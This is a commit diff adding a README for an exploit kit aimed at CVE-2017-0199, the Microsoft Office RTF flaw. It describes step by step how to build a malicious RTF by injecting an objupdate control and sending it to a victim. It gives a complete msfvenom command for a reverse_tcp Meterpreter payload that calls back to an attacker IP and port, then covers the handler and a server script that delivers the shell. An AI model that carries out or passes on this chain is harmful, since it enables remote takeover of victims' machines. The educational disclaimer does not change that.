Create README.md

README.md

@@ -0,0 +1,50 @@
+# Meterpreter shell through CVE-2017-0199
+
+## Demo
+
+https://youtu.be/ymLVH5avkZw
+
+## Steps
+
+##### Step-1) Create a malicious RTF
+		- Start a webserver on attacker machine
+		- Open MS Office word and insert an innocent remote doc file (innocent.doc) as an object
+		- Save the file as RTF
+		- Modify RTF to inject \objupdate control
+		- Stop the webserver on attacker machine
+		- Share this RTF file with victim
+
+
+##### Step-2) Create a meterpreter shell on attacker machine
+		- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > shell.exe
+		- Start multi handler
+
+
+##### Step-3) Start attacker script (server.py)
+		- Specify URL of meterpreter shell
+		- Specify location of shell
+
+
+##### Step-4) Victim opens the document and an attacker gets a reverse meterpreter shell
+
+
+
+
+
+
+
+
+
+
+
+
+
+## Disclaimer
+
+This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.
+
+## Bug, issues, feature requests
+
+Obviously, I am not a fulltime developer so expect some hiccups
+
+Please report bugs, issues to bhdresh@gmail.com